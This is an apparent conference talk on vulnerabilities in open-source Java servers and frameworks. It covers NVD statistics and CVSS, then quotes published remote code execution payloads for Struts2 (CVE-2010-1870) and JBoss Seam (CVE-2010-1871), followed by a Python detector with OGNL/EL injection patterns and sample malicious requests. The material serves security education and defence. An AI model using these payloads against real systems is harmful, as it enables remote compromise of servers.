Security Vulnerabilities in Open Source Java Libraries. Patrycja Wegrzynowicz CTO, Yonita, Inc.




About Me: programmer at heart, researcher in mind, speaker with passion, entrepreneur by need. @yonlabs

Agenda: motivation and methodology; security vulnerabilities, stats and examples (app and web servers, web frameworks); approach to security (what to look for, where to look at).

Disclaimer I do not aim at bashing OSS!

"Hello World in cloud is involve 1 load balancer, 3 web server and 2 database server" (DevOps_Borat, Twitter)

Underneath the application: libraries, app & web servers, databases, operating systems, infrastructure.


Sources: the National Vulnerability Database (NIST Computer Security Division, DHS National Cyber Security Division/US-CERT), http://nvd.nist.gov/; the Open Source Vulnerability Database (Open Security Foundation), http://www.osvdb.org/; the Exploit Database, http://www.exploit-db.com/

Common Vulnerability Scoring System v2. Access Vector: Local, Adjacent Network, Remote. Access Complexity: High, Medium, Low. Authentication: Multiple instances, Single instance, None. Confidentiality: None, Partial, Complete. Integrity: None, Partial, Complete. Availability: None, Partial, Complete.

Common Weakness Enumeration

Vulnerability Types (NVD to CWE mapping): Authentication Issues; Credentials Management; Permissions, Privileges, and Access Control; Buffer Errors; Cross-Site Request Forgery (CSRF); Cross-Site Scripting (XSS); Cryptographic Issues; Path Traversal; Code Injection; Format String Vulnerability; Configuration; Information Leak/Disclosure; Input Validation; Numeric Errors; OS Command Injections; Race Condition; Resource Management Errors; SQL Injection; Link Following. Not in CWE: Insufficient Information; Design Error; Other.

App & Web Servers

App & Web Servers, market share (survey by ZeroTurnaround): Tomcat 33%, JBoss 26%, WebLogic 10%, Jetty 8%, GlassFish 8%, WebSphere 7%, Other 8%.

Number of Vulnerabilities, OSS (based on NVD): Tomcat 100, JBoss AS 7, JBoss EAP 20, GlassFish 14, Jetty 20.

Number of Vulnerabilities, OSS and Proprietary (based on NVD): Tomcat 100, JBoss AS 7, JBoss EAP 20, GlassFish 14, Jetty 20; WebLogic 185, WebSphere 201 (in the order labelled on the chart).

Number of Vulnerabilities, OSS vs Proprietary (based on NVD): OSS (5 platforms) 29%, proprietary (2 platforms) 71%.

[Chart] Vulnerabilities by Year, OSS (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty), 2000-2012. Based on NVD.

[Chart] Vulnerabilities by Year, OSS + Proprietary (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere). Based on NVD.

[Chart] Vulnerabilities by Year, OSS, stacked by server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty), 2000-2012. Based on NVD.

[Chart] Vulnerabilities by Year, OSS and Proprietary, stacked by server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere), 2000-2012. Based on NVD.

Vulnerabilities Scoring (based on NVD). Buckets: LOW [0,4), MEDIUM [4,7), HIGH [7,8], CRITICAL [8,9), WTF?! [9,10]. [Chart: per-bucket counts for Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere]

[Chart] Confidentiality Impact per server (None / Partial / Complete, as a percentage of each server's vulnerabilities). Based on NVD.

[Chart] Integrity Impact per server (None / Partial / Complete, as a percentage of each server's vulnerabilities). Based on NVD.

[Chart] Availability Impact per server (None / Partial / Complete, as a percentage of each server's vulnerabilities). Based on NVD.

[Chart] Vulnerability Types by Server (percentage per server; categories as in the NVD-to-CWE mapping above, plus Unknown). Based on NVD.

[Chart] Top 3 Vulnerabilities per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere); types appearing: Credentials Management, CSRF, Path Traversal, Input Validation, Permissions, XSS, Information Leak. Based on NVD.

[Chart] Types with 3 and more vulnerabilities per server: Authentication Issues; Permissions, Privileges, and Access Control; XSS; Path Traversal; Information Leak; Resource Management Errors; Credentials Management; CSRF; Cryptographic Issues; Configuration; Input Validation; Design Error. Based on NVD.

[Chart] Total Vulnerabilities by Type, stacked by server, types in the order shown on the chart: Cross-Site Scripting (XSS); Permissions, Privileges, and Access Control; Information Leak; Input Validation; Resource Management Errors; Design Error; Cryptographic Issues; Path Traversal; Authentication Issues; Credentials Management; Cross-Site Request Forgery; Configuration; Buffer Errors; Code Injection; Numeric Errors; Race Condition; Link Following; SQL Injection. Based on NVD.

Max CVSS v2: 10. CVE-2011-0807 (20-04-2011): Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration. Vector: AV: Network, AC: Low, Au: None required, C: Complete, I: Complete, A: Complete. Type: Insufficient Information.

Min CVSS v2: 1.2. CVE-2010-3718 (2/10/11): Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack. Vector: AV: Local access, AC: High, Au: None required, C: None, I: Partial, A: None. Type: Design Error.

Web Frameworks

[Chart] Vulnerabilities, selected frameworks: Struts2, JBoss Seam, GWT.

Apache Struts 2 (latest release 2.3.4.1)

CVE-2010-1870 exploit (Struts2). Found by, and exploit shown by, Meder Kydyraliev. Based on his previous bug XW-641:
('\u0023' + 'session[\'user\']')(unused)=0wn3d
which evaluates as #session['user']=0wn3d, i.e. ActionContext.getContext().getSession().put("user", "0wn3d").
ParametersInterceptor blacklists # to prevent tampering with server-side data.

CVE-2010-1870: Struts 2 (8/17/10). The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the # protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberaccess, (3) #root, (4) #this, (5) #_typeresolver, (6) #_classresolver, (7) #_traceevaluations, (8) #_lastevaluation, (9) #_keeplastevaluation, and possibly other OGNL context variables, a different vulnerability. Vector: AV: Network, AC: Low, Au: None required, C: None, I: Partial, A: None. Type: Design Error (NVD-CWE-DesignError).

CVE-2010-1870 exploit. Guards: xwork.MethodAccessor.denyMethodExecution and #_memberAccess.allowStaticMethodAccess. Exploit by Meder Kydyraliev:
#_memberaccess[ allowstaticmethodaccess ] = true
#foo = new java.lang.boolean( false )
#context[ xwork.methodaccessor.denymethodexecution ] = #foo
#rt = @java.lang.runtime@getruntime()
#rt.exec( touch /tmp/dir, null)
Request: /HelloWorld.action?('\u0023_memberAccess [\'allowstaticmethodaccess\']')(meh)=true&(aaa)(('\u0023context [\'xwork.methodaccessor.denymethodexecution\']\u003d\u0023foo') (\u0023foo\u003dnew%20java.lang.boolean("false")))&(ssss)((\u0023r t\ ('mkdir\u0020/tmp/pwned'\u002cnull)))=1

CVE-2010-1871: JBoss Seam (08/05/2010). JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured. CVSS 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P). Type: Input Validation.

CVE-2010-1871 exploit. Found by, and exploit provided by, Meder Kydyraliev:
/seambooking/home.seam?actionoutcome=/pwn.xhtml?pwned%3d%23{expressions.getclass().forname('java.lang.runtime').getdeclaredmethods()[19].invoke(expressions.getclass().forname('java.lang.runtime').getdeclaredmethods()[7].invoke(null), 'mkdir /tmp/ PWNED')}
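As an added example (not code from the deck, Struts or Seam), a log-side detector for the lesson both exploit slides share: the # guard is bypassed by writing the character as \u0023 or %23, so any check has to normalise the request before matching. The context-variable list follows the NVD entry for CVE-2010-1870 plus the #session form from XW-641; the sample request lines are constructed.

```python
import re
from urllib.parse import unquote

# OGNL context variables named in the NVD entry for CVE-2010-1870, plus the
# '#session' form from XW-641 shown on the deck (the list is an assumption).
OGNL_CONTEXT_VARS = ("_memberAccess", "context", "session", "root", "this",
                     "_typeResolver", "_classResolver", "_traceEvaluations",
                     "_lastEvaluation", "_keepLastEvaluation")

def normalize(query: str) -> str:
    """Undo the two encodings the payloads on the slides rely on:
    percent-encoding (%23 -> #) and Java/OGNL unicode escapes (\\u0023 -> #)."""
    decoded = unquote(query)
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), decoded)

def naive_hash_blacklist(query: str) -> bool:
    """The kind of check ParametersInterceptor relied on: a literal '#' in the
    raw parameter. Returns True when the request would be rejected."""
    return "#" in query

def flag_expression_injection(query: str) -> list:
    """Return the markers found after normalisation (empty list = nothing found)."""
    text = normalize(query)
    hits = []
    for var in OGNL_CONTEXT_VARS:
        if re.search(r"#\s*" + re.escape(var) + r"\b", text, re.IGNORECASE):
            hits.append("ognl:#" + var)
    if re.search(r"@[\w.]+@\w+", text):        # OGNL static call: @class@method
        hits.append("ognl:static-access")
    if re.search(r"[#$]\{", text):             # EL expression in a parameter (Seam)
        hits.append("el:expression")
    return hits

# Constructed sample request lines (not from the deck's logs): a benign request,
# the XW-641 form, the CVE-2010-1870 guard toggle, and a Seam EL probe.
SAMPLE_REQUESTS = {
    "benign": "/HelloWorld.action?name=alice&page=2",
    "xw641":  r"/HelloWorld.action?('\u0023session[\'user\']')(unused)=0wn3d",
    "struts": r"/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true",
    "seam":   "/seambooking/home.seam?actionOutcome=/x.xhtml?p%3d%23{expressions.getClass()}",
}

def scan(requests: dict) -> dict:
    """Map each request name to (naive blacklist verdict, normalised findings)."""
    return {name: (naive_hash_blacklist(q), flag_expression_injection(q))
            for name, q in requests.items()}
```

Run scan(SAMPLE_REQUESTS) and note that the naive verdict is False for every line while the normalised detector flags the three non-benign ones.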

How to Assess the Security Level of a Library?

What to Look For? Vulnerabilities and trend; complexity; culture.

Complexity

Culture. "The best indicator of the library's future security is culture that places value on security and clear evidence of broad and rigorous security analysis." Jeff Williams, CEO, Aspect Security

What to Look For?
- Known security vulnerabilities in an OSS library, and trends
- Library complexity, its design and its dependencies
- Security in the software development process of an OSS library:
  - Security during development: security built into the development process
  - Security during issue handling: clear and transparent issue handling, undisclosed details until fixed, a security response team, security bulletins, releases and release notes containing security information

Where to Look At?
- Vulnerability databases: Open Source Vulnerability Database, National Vulnerability Database, Exploit Database
- Vendor site: development process, issue tracker, security bulletins, release notes
- Dependency hell: use the support of a dependency management tool (e.g. update reports in Maven)

patrycja@yonita.com @yonlabs